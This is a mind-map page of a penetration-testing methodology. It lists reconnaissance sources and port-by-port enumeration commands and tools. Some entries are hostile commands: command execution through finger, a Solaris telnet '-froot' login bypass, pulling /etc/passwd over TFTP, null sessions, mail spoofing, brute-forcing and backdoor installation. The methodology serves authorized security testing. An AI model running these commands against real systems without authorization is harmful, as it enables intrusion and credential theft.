Penetration Testing Framework 0.58

Começar. É Gratuito
ou inscrever-se com seu endereço de e-mail
Rocket clouds
Penetration Testing Framework 0.58 por Mind Map: Penetration Testing Framework 0.58

1. Pre-Inspection Visit - template

2. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

2.1. Untitled

2.1.1. Authoratitive Bodies

2.1.1.1. IANA - Internet Assigned Numbers Authority

2.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

2.1.1.3. NRO - Number Resource Organisation

2.1.1.4. RIR - Regional Internet Registry

2.1.1.4.1. AFRINIC - African Network Information Centre

2.1.1.4.2. APNIC - Asia Pacific Network Information Centre

2.1.1.4.3. ARIN - American Registry for Internet Numbers

2.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

2.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

2.1.2. Websites

2.1.2.1. Central Ops

2.1.2.1.1. Domain Dossier

2.1.2.1.2. Email Dossier

2.1.2.2. DNS Stuff

2.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

2.1.2.3. Fixed Orbit

2.1.2.3.1. Autonomous System lookups and other online tools available.

2.1.2.4. Geektools

2.1.2.5. IP2Location

2.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

2.1.2.6. Kartoo

2.1.2.6.1. Metasearch engine that visually presents its results.

2.1.2.7. MyIPNeighbors.com

2.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

2.1.2.8. My-IP-Neighbors.com

2.1.2.8.1. Excellent site that can be used if the above is down

2.1.2.9. myipneighbors.net

2.1.2.10. Netcraft

2.1.2.10.1. Online search tool allowing queries for host information.

2.1.2.11. Passive DNS Replication

2.1.2.11.1. Finds shared domains based on supplied IP addresses

2.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

2.1.2.12. Robtex

2.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

2.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

2.1.2.13. Traceroute.org

2.1.2.13.1. Website listing a large number links to online traceroute resources.

2.1.2.14. Wayback Machine

2.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

2.1.2.15. Whois.net

2.1.3. Tools

2.1.3.1. Cheops-ng

2.1.3.2. Country whois

2.1.3.3. Domain Research Tool

2.1.3.4. Firefox Plugins

2.1.3.4.1. AS Number

2.1.3.4.2. Shazou

2.1.3.4.3. Firecat Suite

2.1.3.5. Gnetutil

2.1.3.6. Goolag Scanner

2.1.3.7. Greenwich

2.1.3.8. Maltego

2.1.3.9. GTWhois

2.1.3.10. Sam Spade

2.1.3.11. Smart whois

2.1.3.12. SpiderFoot

2.2. Internet Search

2.2.1. General Information

2.2.1.1. Web Investigator

2.2.1.2. Tracesmart

2.2.1.3. Friends Reunited

2.2.1.4. Ebay - profiles etc.

2.2.2. Financial

2.2.2.1. EDGAR - Company information, including real-time filings. US

2.2.2.2. Google Finance - General Finance Portal

2.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

2.2.2.4. Companies House UK

2.2.2.5. Land Registry UK

2.2.3. Phone book/ Electoral Role Information

2.2.3.1. 123people

2.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

2.2.3.2. 192.com

2.2.3.2.1. Electoral Role Search. UK

2.2.3.3. 411

2.2.3.3.1. Online White Pages and Yellow Pages. US

2.2.3.4. Untitled

2.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

2.2.3.5. BT.com. UK

2.2.3.5.1. Residential

2.2.3.5.2. Business

2.2.3.6. Pipl

2.2.3.6.1. Untitled

2.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

2.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

2.2.3.7. Spokeo

2.2.3.7.1. http://www.spokeo.com/user?q=domain_name

2.2.3.7.2. http://www.spokeo.com/user?q=email_address

2.2.3.8. Yasni

2.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

2.2.3.9. Zabasearch

2.2.3.9.1. People Search Engine. US

2.2.4. Generic Web Searching

2.2.4.1. Code Search

2.2.4.2. Forum Entries

2.2.4.3. Google Hacking Database

2.2.4.4. Google

2.2.4.4.1. Back end files

2.2.4.4.2. Email Addresses

2.2.4.4.3. Contact Details

2.2.4.5. Newsgroups/forums

2.2.4.6. Blog Search

2.2.4.6.1. Yammer

2.2.4.6.2. Google Blog Search

2.2.4.6.3. Technorati

2.2.4.6.4. Jaiku

2.2.4.6.5. Present.ly

2.2.4.6.6. Twitter Network Browser

2.2.4.7. Search Engine Comparison/ Aggregator Sites

2.2.4.7.1. Clusty

2.2.4.7.2. Grokker

2.2.4.7.3. Zuula

2.2.4.7.4. Exalead

2.2.4.7.5. Delicious

2.2.5. Metadata Search

2.2.5.1. Untitled

2.2.5.1.1. MetaData Visualisation Sites

2.2.5.1.2. Tools

2.2.5.1.3. Wikipedia Metadata Search

2.2.6. Social/ Business Networks

2.2.6.1. Untitled

2.2.6.1.1. Africa

2.2.6.1.2. Australia

2.2.6.1.3. Belgium

2.2.6.1.4. Holland

2.2.6.1.5. Hungary

2.2.6.1.6. Iran

2.2.6.1.7. Japan

2.2.6.1.8. Korea

2.2.6.1.9. Poland

2.2.6.1.10. Russia

2.2.6.1.11. Sweden

2.2.6.1.12. UK

2.2.6.1.13. US

2.2.6.1.14. Assorted

2.2.7. Resources

2.2.7.1. OSINT

2.2.7.2. International Directory of Search Engines

2.3. DNS Record Retrieval from publically available servers

2.3.1. Types of Information Records

2.3.1.1. SOA Records - Indicates the server that has authority for the domain.

2.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

2.3.1.3. NS Records - List of a host’s or domain’s name server(s).

2.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

2.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

2.3.1.6. SRV Records - Service location record.

2.3.1.7. HINFO Records - Host information record with CPU type and operating system.

2.3.1.8. TXT Records - Generic text record.

2.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

2.3.1.10. RP - Responsible person for the domain.

2.3.2. Database Settings

2.3.2.1. Version.bind

2.3.2.2. Serial

2.3.2.3. Refresh

2.3.2.4. Retry

2.3.2.5. Expiry

2.3.2.6. Minimum

2.3.3. Sub Domains

2.3.4. Internal IP ranges

2.3.4.1. Reverse DNS for IP Range

2.3.5. Zone Transfer

2.4. Social Engineering

2.4.1. Remote

2.4.1.1. Phone

2.4.1.1.1. Scenarios

2.4.1.1.2. Results

2.4.1.1.3. Contact Details

2.4.1.2. Email

2.4.1.2.1. Scenarios

2.4.1.2.2. Software

2.4.1.2.3. Results

2.4.1.2.4. Contact Details

2.4.1.3. Other

2.4.2. Local

2.4.2.1. Personas

2.4.2.1.1. Name

2.4.2.1.2. Phone

2.4.2.1.3. Email

2.4.2.1.4. Business Cards

2.4.2.2. Contact Details

2.4.2.2.1. Name

2.4.2.2.2. Phone number

2.4.2.2.3. Email

2.4.2.2.4. Room number

2.4.2.2.5. Department

2.4.2.2.6. Role

2.4.2.3. Scenarios

2.4.2.3.1. New IT employee

2.4.2.3.2. Fire Inspector

2.4.2.4. Results

2.4.2.5. Maps

2.4.2.5.1. Satalitte Imagery

2.4.2.5.2. Building layouts

2.4.2.6. Other

2.5. Dumpster Diving

2.5.1. Rubbish Bins

2.5.2. Contract Waste Removal

2.5.3. Ebay ex-stock sales i.e. HDD

2.6. Web Site copy

2.6.1. htttrack

2.6.2. teleport pro

2.6.3. Black Widow

3. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

3.1. Default Port Lists

3.1.1. Windows

3.1.2. *nix

3.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

3.2.1. General Enumeration Tools

3.2.1.1. nmap

3.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

3.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

3.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

3.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

3.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

3.2.1.2. netcat

3.2.1.2.1. nc -v -n IP_Address port

3.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

3.2.1.3. amap

3.2.1.3.1. amap -bqv 192.168.1.1 80

3.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

3.2.1.4. xprobe2

3.2.1.4.1. xprobe2 192.168.1.1

3.2.1.5. sinfp

3.2.1.5.1. ./sinfp.pl -i -p

3.2.1.6. nbtscan

3.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

3.2.1.7. hping

3.2.1.7.1. hping ip_address

3.2.1.8. scanrand

3.2.1.8.1. scanrand ip_address:all

3.2.1.9. unicornscan

3.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

3.2.1.10. netenum

3.2.1.10.1. netenum network/netmask timeout

3.2.1.11. fping

3.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

3.2.2. Firewall Specific Tools

3.2.2.1. firewalk

3.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

3.2.2.2. ftester

3.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

3.2.3. Default Passwords (Examine list)

3.2.3.1. Passwords A

3.2.3.2. Passwords B

3.2.3.3. Passwords C

3.2.3.4. Passwords D

3.2.3.5. Passwords E

3.2.3.6. Passwords F

3.2.3.7. Passwords G

3.2.3.8. Passwords H

3.2.3.9. Passwords I

3.2.3.10. Passwords J

3.2.3.11. Passwords K

3.2.3.12. Passwords L

3.2.3.13. Passwords M

3.2.3.14. Passwords N

3.2.3.15. Passwords O

3.2.3.16. Passwords P

3.2.3.17. Passwords R

3.2.3.18. Passwords S

3.2.3.19. Passwords T

3.2.3.20. Passwords U

3.2.3.21. Passwords V

3.2.3.22. Passwords W

3.2.3.23. Passwords X

3.2.3.24. Passwords Y

3.2.3.25. Passwords Z

3.2.3.26. Passwords (Numeric)

3.3. Active Hosts

3.3.1. Open TCP Ports

3.3.2. Closed TCP Ports

3.3.3. Open UDP Ports

3.3.4. Closed UDP Ports

3.3.5. Service Probing

3.3.5.1. SMTP Mail Bouncing

3.3.5.2. Banner Grabbing

3.3.5.2.1. Other

3.3.5.2.2. HTTP

3.3.5.2.3. HTTPS

3.3.5.2.4. SMTP

3.3.5.2.5. POP3

3.3.5.2.6. FTP

3.3.6. ICMP Responses

3.3.6.1. Type 3 (Port Unreachable)

3.3.6.2. Type 8 (Echo Request)

3.3.6.3. Type 13 (Timestamp Request)

3.3.6.4. Type 15 (Information Request)

3.3.6.5. Type 17 (Subnet Address Mask Request)

3.3.6.6. Responses from broadcast address

3.3.7. Source Port Scans

3.3.7.1. TCP/UDP 53 (DNS)

3.3.7.2. TCP 20 (FTP Data)

3.3.7.3. TCP 80 (HTTP)

3.3.7.4. TCP/UDP 88 (Kerberos)

3.3.8. Firewall Assessment

3.3.8.1. Firewalk

3.3.8.2. TCP/UDP/ICMP responses

3.3.9. OS Fingerprint

4. Enumeration

4.1. Daytime port 13 open

4.1.1. nmap nse script

4.1.1.1. daytime

4.2. FTP port 21 open

4.2.1. Fingerprint server

4.2.1.1. telnet ip_address 21 (Banner grab)

4.2.1.2. Run command ftp ip_address

4.2.1.3. [email protected]

4.2.1.4. Check for anonymous access

4.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

4.2.2. Password guessing

4.2.2.1. Hydra brute force

4.2.2.2. medusa

4.2.2.3. Brutus

4.2.3. Examine configuration files

4.2.3.1. ftpusers

4.2.3.2. ftp.conf

4.2.3.3. proftpd.conf

4.2.4. MiTM

4.2.4.1. pasvagg.pl

4.3. SSH port 22 open

4.3.1. Fingerprint server

4.3.1.1. telnet ip_address 22 (banner grab)

4.3.1.2. scanssh

4.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

4.3.2. Password guessing

4.3.2.1. ssh [email protected]_address

4.3.2.2. guess-who

4.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

4.3.2.3. Hydra brute force

4.3.2.4. brutessh

4.3.2.5. Ruby SSH Bruteforcer

4.3.3. Examine configuration files

4.3.3.1. ssh_config

4.3.3.2. sshd_config

4.3.3.3. authorized_keys

4.3.3.4. ssh_known_hosts

4.3.3.5. .shosts

4.3.4. SSH Client programs

4.3.4.1. tunnelier

4.3.4.2. winsshd

4.3.4.3. putty

4.3.4.4. winscp

4.4. Telnet port 23 open

4.4.1. Fingerprint server

4.4.1.1. telnet ip_address

4.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

4.4.1.2. telnetfp

4.4.2. Password Attack

4.4.2.1. Untitled

4.4.2.2. Hydra brute force

4.4.2.3. Brutus

4.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

4.4.3. Examine configuration files

4.4.3.1. /etc/inetd.conf

4.4.3.2. /etc/xinetd.d/telnet

4.4.3.3. /etc/xinetd.d/stelnet

4.5. Sendmail Port 25 open

4.5.1. Fingerprint server

4.5.1.1. telnet ip_address 25 (banner grab)

4.5.2. Mail Server Testing

4.5.2.1. Enumerate users

4.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

4.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

4.5.2.2. Mail Spoof Test

4.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

4.5.2.3. Mail Relay Test

4.5.2.3.1. Untitled

4.5.3. Examine Configuration Files

4.5.3.1. sendmail.cf

4.5.3.2. submit.cf

4.6. DNS port 53 open

4.6.1. Fingerprint server/ service

4.6.1.1. host

4.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

4.6.1.2. nslookup

4.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

4.6.1.3. dig

4.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

4.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

4.6.2. DNS Enumeration

4.6.2.1. Bile Suite

4.6.2.1.1. perl BiLE.pl [website] [project_name]

4.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

4.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

4.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

4.6.2.1.5. perl exp-tld.pl [input file] [output file]

4.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

4.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

4.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

4.6.2.2. txdns

4.6.2.2.1. txdns -rt -t domain_name

4.6.2.2.2. txdns -x 50 -bb domain_name

4.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

4.6.2.3. nmap nse scripts

4.6.2.3.1. dns-random-srcport

4.6.2.3.2. dns-random-txid

4.6.2.3.3. dns-recursion

4.6.2.3.4. dns-zone-transfer

4.6.3. Examine Configuration Files

4.6.3.1. host.conf

4.6.3.2. resolv.conf

4.6.3.3. named.conf

4.7. TFTP port 69 open

4.7.1. TFTP Enumeration

4.7.1.1. tftp ip_address PUT local_file

4.7.1.2. tftp ip_address GET conf.txt (or other files)

4.7.1.3. Solarwinds TFTP server

4.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

4.7.2. TFTP Bruteforcing

4.7.2.1. TFTP bruteforcer

4.7.2.2. Cisco-Torch

4.8. Finger Port 79 open

4.8.1. User enumeration

4.8.1.1. finger 'a b c d e f g h' @example.com

4.8.1.2. finger [email protected]

4.8.1.3. finger [email protected]

4.8.1.4. finger [email protected]

4.8.1.5. finger [email protected]

4.8.1.6. finger **@example.com

4.8.1.7. finger [email protected]

4.8.1.8. finger @example.com

4.8.1.9. nmap nse script

4.8.1.9.1. finger

4.8.2. Command execution

4.8.2.1. finger "|/bin/[email protected]"

4.8.2.2. finger "|/bin/ls -a /@example.com"

4.8.3. Finger Bounce

4.8.3.1. finger [email protected]@victim

4.8.3.2. finger @[email protected]

4.9. Web Ports 80,8080 etc. open

4.9.1. Fingerprint server

4.9.1.1. Telnet ip_address port

4.9.1.2. Firefox plugins

4.9.1.2.1. All

4.9.1.2.2. Specific

4.9.2. Crawl website

4.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

4.9.2.2. httprint

4.9.2.3. Metagoofil

4.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

4.9.3. Web Directory enumeration

4.9.3.1. Nikto

4.9.3.1.1. nikto [-h target] [options]

4.9.3.2. DirBuster

4.9.3.3. Wikto

4.9.3.4. Goolag Scanner

4.9.4. Vulnerability Assessment

4.9.4.1. Manual Tests

4.9.4.1.1. Default Passwords

4.9.4.1.2. Install Backdoors

4.9.4.1.3. Method Testing

4.9.4.1.4. Upload Files

4.9.4.1.5. View Page Source

4.9.4.1.6. Input Validation Checks

4.9.4.1.7. Automated table and column iteration

4.9.4.2. Vulnerability Scanners

4.9.4.2.1. Acunetix

4.9.4.2.2. Grendelscan

4.9.4.2.3. NStealth

4.9.4.2.4. Obiwan III

4.9.4.2.5. w3af

4.9.4.3. Specific Applications/ Server Tools

4.9.4.3.1. Domino

4.9.4.3.2. Joomla

4.9.4.3.3. aspaudit.pl

4.9.4.3.4. Vbulletin

4.9.4.3.5. ZyXel

4.9.5. Proxy Testing

4.9.5.1. Burpsuite

4.9.5.2. Crowbar

4.9.5.3. Interceptor

4.9.5.4. Paros

4.9.5.5. Requester Raw

4.9.5.6. Suru

4.9.5.7. WebScarab

4.9.6. Examine configuration files

4.9.6.1. Generic

4.9.6.1.1. Examine httpd.conf/ windows config files

4.9.6.2. JBoss

4.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

4.9.6.3. Joomla

4.9.6.3.1. configuration.php

4.9.6.3.2. diagnostics.php

4.9.6.3.3. joomla.inc.php

4.9.6.3.4. config.inc.php

4.9.6.4. Mambo

4.9.6.4.1. configuration.php

4.9.6.4.2. config.inc.php

4.9.6.5. Wordpress

4.9.6.5.1. setup-config.php

4.9.6.5.2. wp-config.php

4.9.6.6. ZyXel

4.9.6.6.1. /WAN.html (contains PPPoE ISP password)

4.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

4.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

4.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

4.9.6.6.5. /CF_Keyword.html (Content Filter)

4.9.6.6.6. /RemMagWWW.html (Remote MGMT)

4.9.6.6.7. /rpSysAdmin.html (System)

4.9.6.6.8. /LAN_IP.html (LAN)

4.9.6.6.9. /NAT_General.html (NAT)

4.9.6.6.10. /ViewLog.html (Logs)

4.9.6.6.11. /rpFWUpload.html (Tools)

4.9.6.6.12. /DiagGeneral.html (Diagnostic)

4.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

4.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

4.9.6.6.15. Config Backups

4.9.7. Examine web server logs

4.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

4.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

4.9.8. References

4.9.8.1. White Papers

4.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

4.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

4.9.8.1.3. Blind Security Testing - An Evolutionary Approach

4.9.8.1.4. Command Injection in XML Signatures and Encryption

4.9.8.1.5. Input Validation Cheat Sheet

4.9.8.1.6. SQL Injection Cheat Sheet

4.9.8.2. Books

4.9.8.2.1. Hacking Exposed Web 2.0

4.9.8.2.2. Hacking Exposed Web Applications

4.9.8.2.3. The Web Application Hacker's Handbook

4.9.9. Exploit Frameworks

4.9.9.1. Brute-force Tools

4.9.9.1.1. Acunetix

4.9.9.2. Metasploit

4.9.9.3. w3af

4.10. Portmapper port 111 open

4.10.1. rpcdump.py

4.10.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)

4.10.2. rpcinfo

4.10.2.1. rpcinfo [options] IP_Address

4.11. NTP Port 123 open

4.11.1. NTP Enumeration

4.11.1.1. ntpdc -c monlist IP_ADDRESS

4.11.1.2. ntpdc -c sysinfo IP_ADDRESS

4.11.1.3. ntpq

4.11.1.3.1. host

4.11.1.3.2. hostname

4.11.1.3.3. ntpversion

4.11.1.3.4. readlist

4.11.1.3.5. version

4.11.2. Examine configuration files

4.11.2.1. ntp.conf

4.11.3. nmap nse script

4.11.3.1. ntp-info

4.12. NetBIOS Ports 135-139,445 open

4.12.1. NetBIOS enumeration

4.12.1.1. Enum

4.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

4.12.1.2. Null Session

4.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

4.12.1.3. Smbclient

4.12.1.3.1. smbclient -L //server/share password options

4.12.1.4. Superscan

4.12.1.4.1. Enumeration tab.

4.12.1.5. user2sid/sid2user

4.12.1.6. Winfo

4.12.2. NetBIOS brute force

4.12.2.1. Hydra

4.12.2.2. Brutus

4.12.2.3. Cain & Abel

4.12.2.4. getacct

4.12.2.5. NAT (NetBIOS Auditing Tool)

4.12.3. Examine Configuration Files

4.12.3.1. Smb.conf

4.12.3.2. lmhosts

4.13. SNMP port 161 open

4.13.1. Default Community Strings

4.13.1.1. public

4.13.1.2. private

4.13.1.3. cisco

4.13.1.3.1. cable-docsis

4.13.1.3.2. ILMI

4.13.2. MIB enumeration

4.13.2.1. Windows NT

4.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

4.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

4.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

4.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

4.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

4.13.2.2. Solarwinds MIB walk

4.13.2.3. Getif

4.13.2.4. snmpwalk

4.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

4.13.2.5. Snscan

4.13.2.6. Applications

4.13.2.6.1. ZyXel

4.13.2.7. nmap nse script

4.13.2.7.1. snmp-sysdescr

4.13.3. SNMP Bruteforce

4.13.3.1. onesixtyone

4.13.3.1.1. onesixytone -c SNMP.wordlist <IP>

4.13.3.2. cat

4.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

4.13.3.3. Solarwinds SNMP Brute Force

4.13.3.4. ADMsnmp

4.13.3.5. nmap nse script

4.13.3.5.1. snmp-brute

4.13.4. Examine SNMP Configuration files

4.13.4.1. snmp.conf

4.13.4.2. snmpd.conf

4.13.4.3. snmp-config.xml

4.14. LDAP Port 389 Open

4.14.1. ldap enumeration

4.14.1.1. ldapminer

4.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

4.14.1.2. luma

4.14.1.2.1. Gui based tool

4.14.1.3. ldp

4.14.1.3.1. Gui based tool

4.14.1.4. openldap

4.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

4.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

4.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

4.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

4.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

4.14.2. ldap brute force

4.14.2.1. bf_ldap

4.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

4.14.2.2. K0ldS

4.14.2.3. LDAP_Brute.pl

4.14.3. Examine Configuration Files

4.14.3.1. General

4.14.3.1.1. containers.ldif

4.14.3.1.2. ldap.cfg

4.14.3.1.3. ldap.conf

4.14.3.1.4. ldap.xml

4.14.3.1.5. ldap-config.xml

4.14.3.1.6. ldap-realm.xml

4.14.3.1.7. slapd.conf

4.14.3.2. IBM SecureWay V3 server

4.14.3.2.1. V3.sas.oc

4.14.3.3. Microsoft Active Directory server

4.14.3.3.1. msadClassesAttrs.ldif

4.14.3.4. Netscape Directory Server 4

4.14.3.4.1. nsslapd.sas_at.conf

4.14.3.4.2. nsslapd.sas_oc.conf

4.14.3.5. OpenLDAP directory server

4.14.3.5.1. slapd.sas_at.conf

4.14.3.5.2. slapd.sas_oc.conf

4.14.3.6. Sun ONE Directory Server 5.1

4.14.3.6.1. 75sas.ldif

4.15. PPTP/L2TP/VPN port 500/1723 open

4.15.1. Enumeration

4.15.1.1. ike-scan

4.15.1.2. ike-probe

4.15.2. Brute-Force

4.15.2.1. ike-crack

4.15.3. Reference Material

4.15.3.1. PSK cracking paper

4.15.3.2. SecurityFocus Infocus

4.15.3.3. Scanning a VPN Implementation

4.16. Modbus port 502 open

4.16.1. modscan

4.17. rlogin port 513 open

4.17.1. Rlogin Enumeration

4.17.1.1. Find the files

4.17.1.1.1. find / -name .rhosts

4.17.1.1.2. locate .rhosts

4.17.1.2. Examine Files

4.17.1.2.1. cat .rhosts

